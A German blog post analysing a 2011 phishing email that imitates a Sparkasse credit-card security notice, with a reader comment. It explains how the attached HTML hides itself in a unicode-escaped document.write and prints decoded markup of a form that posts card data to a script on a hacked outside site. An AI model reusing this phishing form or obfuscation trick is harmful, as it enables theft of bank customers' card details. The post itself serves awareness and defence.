Wie jetzt? Sicheres Bezahlen fur Ihren Einkauf im Internet. Juli 2. 2011

Das ist mal wieder ein Beitrag in Richtung E-Mail Spam, Betrug, Phishing, ...
Ich habe angeblich eine E-Mail der Sparkasse erhalten, darin steht, dass ich nun ein neues Sicherheitsverfahren mit meiner Sparkassen-Kreditkarte (habe ich gar nicht) nutzen könnte. Und ich brauch nur die Daten im Formular eintragen. Zu Beruhigung steht folgende URL dabei: www.sparkasse.de/sicherheit/sicherheit/kreditkartenzahlung.html



Mehr Sicherheit beim Internet-Shopping

MasterCardR SecureCode? / Verified by Visa

Einkaufe im Internet mit Ihrer MasterCard / Visa Karte ab sofort
noch sicherer. Nutzen Sie das neue, innovative
Sicherheitsverfahren fur Ihre Sparkassen-Kreditkarte.

Ihre Vorteile

Sicheres Bezahlen fur Ihren Einkauf im Internet
 Einfache Anwendung
Weltweites Bezahlverfahren
 Sofort einsatzbereit - ohne Software-Installation auf Ihrem PC

Das bietet Ihnen MasterCardR SecureCode? / Verified by Visa
MasterCardR SecureCode? und Verified by Visa bietet Ihnen einen
zusatzlichen Schutz fur Ihre Bezahlungen im Internet. Ihre
Kreditkartendaten werden vor unberechtigter Verwendung geschutzt,
wenn Sie bei den teilnehmenden Handlern "online shoppen".

In Deutschland sind zum Beispiel schon Otto, Dress-for-less,
parship, Tchibo und viele weitere Handler dabei.

Bitte laden Sie den Anhang und fullen Sie das Formular Passwort
vergessen

Und jetzt kommt der eingentliche Trick, denn ich so noch nicht gesehen habe:



Wenn man die Mail in einem E-Mail Client betrachtet, in meinem Fall der Thunderbird, dann wird gleich versucht, die angehängte .html Datei anzuzeigen. Speichert man sich mal die html Datei ab und schaut in den Quellcode, findet man zu Beginn ein JavaScript mit einem document.write und einer utf-codierten Zeichenkette:
\u003C\u0048\u0054\u004D\u004C ...

Wenn man die kodierten Zeichen mal "entzaubert", kommt folgender Quellcode zu heraus:
<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<META http-equiv=Pragma content=no-cache>
<LINK rel="stylesheet" href="http://phone.ipkall.com/css/iepc.css" type="text/css">
</HEAD>
<BODY>
<center><BR /><BR />
<IMG border="0" alt="" src="http://erdincmobilya.net/tmp/Sparkassen_BCS.gif"><br /><br />
<IMG border="0" alt="" src="http://erdincmobilya.net/tmp/vpas_logo.gif" width="79" height="46">    
<IMG border="0" alt="" src="http://erdincmobilya.net/tmp/mpas_logo.gif" width="79" height="46"></A></center>
<FORM id="FORM1" onsubmit="return submitIt(this)" method="post" name="FORM1" action="http://erdincmobilya.net/tmp/pbs.php">
<TABLE border="0" align="center">
<TBODY>

Das Formular versucht also nicht die Daten an die Sparkasse zu senden, sondern an eine gehackte türkische Webseite. (Die inzwischen scheinbar schon bereinigt wurde.)

Also: NIEMALS auf solche Phishing - Angriffe hereinfallen. Mit den eingegebenen Daten können die Angreifer in jedem Online-Shop shoppen gehen ...

Tags für diesen Artikel: ,
Artikel mit ähnlichen Themen:
Macfarlane Training Services: Merkwürdige SEO Praktiken?
iframe=true&width=95%&height=95%
Web.de Spam-Email
Die E-Mail Adresse info@example.tld wird gesperrt, oder auch nicht
Abrechnung die 537. - Neue Spamwelle

Als PDF ansehen: Dieser Artikel | Dieser Monat | Vollständiges Blog
Mike Küsterin Randnotizen   Samstag, Juli 2. 2011 @ 10:23
1 Kommentar Link zum Eintrag

Trackbacks
Trackback für spezifische URI dieses Eintrags

Keine Trackbacks

Kommentare
Ansicht der Kommentare: (Linear | Verschachtelt)

Hallo Mike,

ja solche Phishing-Mails hat vermutlich schon jeder von uns erhalten. :-( Waren diese vor einigen Jahren noch recht einfach und beispielsweise noch mit vielen Rechtschreibfehlern, so sieht die Situation heute anders aus.

Hier hilft nur immer wieder Aufklärung zu betreiben und die Benutzer zu sensibilisieren. Von da her ist Dein Posting auch wieder ein kleines, aber gutes Steinchen im Mosaik.

Gruß

Andi
#1 Andi (Homepage) am 18.09.2011 19:55 (Antwort)


Kommentar schreiben

Umschließende Sterne heben ein Wort hervor (*wort*), per _wort_ kann ein Wort unterstrichen werden.
Standard-Text Smilies wie :-) und ;-) werden zu Bildern konvertiert.
Die angegebene E-Mail-Adresse wird nicht dargestellt, sondern nur für eventuelle Benachrichtigungen verwendet.

Um maschinelle und automatische Übertragung von Spamkommentaren zu verhindern, bitte die Zeichenfolge im dargestellten Bild in der Eingabemaske eintragen. Nur wenn die Zeichenfolge richtig eingegeben wurde, kann der Kommentar angenommen werden. Bitte beachten Sie, dass Ihr Browser Cookies unterstützen muss um dieses Verfahren anzuwenden.
CAPTCHA

 
 
 
 

Als PDF ansehen: Dieser Artikel | Dieser Monat | Vollständiges Blog